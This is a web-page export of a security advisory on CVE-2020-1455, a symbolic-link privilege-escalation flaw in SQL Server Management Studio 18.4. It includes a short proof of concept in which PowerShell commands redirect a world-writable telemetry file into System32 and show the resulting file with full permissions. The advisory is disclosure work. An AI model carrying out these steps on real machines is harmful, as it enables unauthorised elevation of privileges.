{"id":16681,"date":"2021-07-08T13:36:55","date_gmt":"2021-07-08T11:36:55","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2020-0030\/"},"modified":"2021-07-19T14:15:33","modified_gmt":"2021-07-19T12:15:33","slug":"usd-2020-0030","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2020-0030\/","title":{"rendered":"usd-2020-0030"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

usd-2020-0030 | SQL Server Management Studio 18.4<\/span><\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2020-0030<\/span>
CVE Number<\/strong>: CVE-2020-1455 <\/span>
Affected Product<\/strong>: SQL Server Management Studio (SSMS)<\/span>
Affected Version<\/strong>: 18.4<\/span>
Vulnerability Type<\/strong>: Symbolic Link Vulnerability<\/span>
Security Risk<\/strong>: High<\/span>
Vendor URL<\/strong>: https:\/\/docs.microsoft.com\/de-de\/sql\/ssms\/download-sql-server-management-studio-ssms?view=sql-server-ver15<\/a><\/span>
Vendor Status<\/strong>: Fixed<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

Symbolic link attacks have become more and more popular on Windows operating systems. A symbolic link is just a directory entry that points to a different location of the file system and redirects certain file operations to the actual target. When privileged processes interact with user controlled parts of the file system, symbolic links can be used to redirect privileged file operations in order to achieve an elevation of privileges. However, it should be noticed that low privileged user accounts are not able to create symbolic links that connect two ordinary file system locations. That being said, there is a workaround that allows the creation of pseudo symbolic links, as demonstrated by <\/span>James Forshaw<\/a>.<\/span><\/p>\n

<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n

After installing the SQL Server Management Studio (SSMS) by using the corresponding installer, one can find a <\/span>.json<\/strong> file that is created inside the\u00a0<\/span>C:\\ProgramData\\vstelemetry\\Default<\/code> folder. As shown in the following listing, this file allows everyone full access, which represents a non inherited file permission.<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]PS C:\\ProgramData\\vstelemetry\\Default> dir<\/p>\n

Directory: C:\\ProgramData\\vstelemetry\\Default<\/p>\n

Mode LastWriteTime Length Name
\n---- ------------- ------ ----
\n-a---- 3\/19\/2020 5:24 PM 7275 Default.manifest.json<\/p>\n

PS C:\\ProgramData\\vstelemetry\\Default> icacls .\\Default.manifest.json
\n.\\Default.manifest.json Everyone:(F)
\n NT AUTHORITY\\SYSTEM:(I)(F)
\n BUILTIN\\Administrators:(I)(F)
\n MSEDGEWIN10\\IEUser:(I)(F)
\n BUILTIN\\Users:(I)(RX)<\/p>\n

Successfully processed 1 files; Failed processing 0 files<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

A quick analysis with <\/span>Procmon<\/a> reveals that the corresponding file is accessed on each startup of SSMS. If it already exists, it is only read by the application. However, if it does not exist, it gets created and the file permissions are set explicitly.<\/span><\/p>\n

[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2021\/07\/procmon.png\" title_text=\"procmon\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"27px||43px||false|false\"][\/et_pb_image][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n

This could allow an attacker to achieve an elevation of privileges by using a symbolic link attack. For demonstration, we use the <\/span>symboliclink-testing-tools<\/a> of James Forshaw to create a symbolic link that points to a non existing file inside of a protected directory.<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]PS C:\\> del C:\\ProgramData\\vstelemetry\\Default\\Default.manifest.json
\nPS C:\\> C:\\Users\\Public\\CreateSymlink.exe -p C:\\ProgramData\\vstelemetry\\Default\\Default.manifest.json C:\\Windows\\System32\\malicious.dll<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n

Now one has to wait until a privileged user account opens the SQL Server Management Studio. In our demonstration, we open SSMS as administrator and can verify that the application follows the symbolic link.<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]PS C:\\> dir C:\\Windows\\System32\\malicious.dll<\/p>\n

Directory: C:\\Windows\\System32<\/p>\n

Mode LastWriteTime Length Name
\n---- ------------- ------ ----
\n-a---- 3\/19\/2020 5:40 PM 7275 malicious.dll<\/p>\n

PS C:\\> icacls C:\\Windows\\System32\\malicious.dll
\nC:\\Windows\\System32\\malicious.dll Everyone:(F)
\n NT AUTHORITY\\SYSTEM:(I)(F)
\n BUILTIN\\Administrators:(I)(F)
\n BUILTIN\\Users:(I)(RX)
\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)
\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)<\/p>\n

Successfully processed 1 files; Failed processing 0 files<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

\n
\n

Since everyone gets assigned full control over the newly generated file, the file can now be overwritten with arbitrary contents. This should be sufficient to perform a privilege escalation attack.<\/p>\n

Relying on an administrative user account for opening SSMS is of course very limiting, but also other user accounts can be tricked to write files into protected locations, where the attacker account does not have access to. Furthermore, it should be noticed that this attack can also be executed during the installation process of SSMS. This could allow an elevation of privileges on workstations that use different kinds of software distribution solutions.<\/p>\n

Fix<\/h3>\n

File operations on directories that are controlled by low privileged user accounts should always be treated with special care. It is recommended to create a separate configuration file for each user account inside of a protected folder that is only writable\/modifiable by the corresponding user.<\/span><\/p>\n

<\/h3>\n

Timeline<\/h3>\n
    \n
  • 2020-03-20 Security vulnerability is found by one of our researchers<\/li>\n
  • 2020-04-02 Security vulnerability submitted via MSRC<\/li>\n
  • 2020-08-10 Microsoft releases a fix<\/li>\n
  • 2020-10-27 Security advisory released<\/li>\n<\/ul>\n

    <\/h3>\n

    Credits<\/h3>\n

    This security vulnerability was found by Tobias Neitzel of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n

    [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"

    usd-2020-0030 | SQL Server Management Studio 18.4 Advisory ID: usd-2020-0030CVE Number: CVE-2020-1455 Affected Product: SQL Server Management Studio (SSMS)Affected Version: 18.4Vulnerability Type: Symbolic Link VulnerabilitySecurity Risk: HighVendor URL: https:\/\/docs.microsoft.com\/de-de\/sql\/ssms\/download-sql-server-management-studio-ssms?view=sql-server-ver15Vendor Status: Fixed Description Symbolic link attacks have become more and more popular on Windows operating systems. A symbolic link is just a directory entry that points […]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16681","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16681","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16681"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16681\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16681"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}